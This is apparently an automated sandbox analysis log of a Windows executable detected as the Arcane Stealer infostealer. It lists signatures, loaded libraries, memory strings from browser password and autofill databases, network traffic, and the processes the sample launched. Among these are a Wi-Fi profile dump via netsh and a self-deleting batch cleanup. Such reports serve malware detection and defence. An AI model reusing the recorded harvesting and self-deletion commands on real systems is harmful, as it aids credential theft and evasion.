                        Source: zyEDYRU0jw.exeString found in binary or memory: https://x.com-https://ads.google.com-https://pay.google.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49757 version: TLS 1.2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        E-Banking Fraud

                        barindex
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0183E9980_2_0183E998
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_01837D700_2_01837D70
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0183E9880_2_0183E988
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_018358B30_2_018358B3
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_018358C80_2_018358C8
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_087131480_2_08713148
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871B9A00_2_0871B9A0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_08716A480_2_08716A48
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_08713A180_2_08713A18
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871EDB00_2_0871EDB0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871E06C0_2_0871E06C
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871E19D0_2_0871E19D
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871E4EF0_2_0871E4EF
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_08712E000_2_08712E00
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_088906E80_2_088906E8
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_088906E20_2_088906E2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000033E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000033E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000388A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000388A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108442326680.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exeBinary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, ChromeDevToolsWrapper.csSuspicious URL: 'https://avito.ru', 'https://rambler.ru', 'https://yandex.ru'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/18@3/2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_08714B50 CreateToolhelp32Snapshot,0_2_08714B50
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:304:WilStaging_02
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4524
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile created: C:\Users\user\AppData\Local\Temp\h5d0oy2n.wjlJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
                        Source: zyEDYRU0jw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: zyEDYRU0jw.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4524)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004508000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD05000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004529000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004490000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004454000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004472000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                        Source: zyEDYRU0jw.exeReversingLabs: Detection: 63%
                        Source: unknownProcess created: C:\Users\user\Desktop\zyEDYRU0jw.exe "C:\Users\user\Desktop\zyEDYRU0jw.exe"
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: Window RecorderWindow detected: More than 3 window changes detected
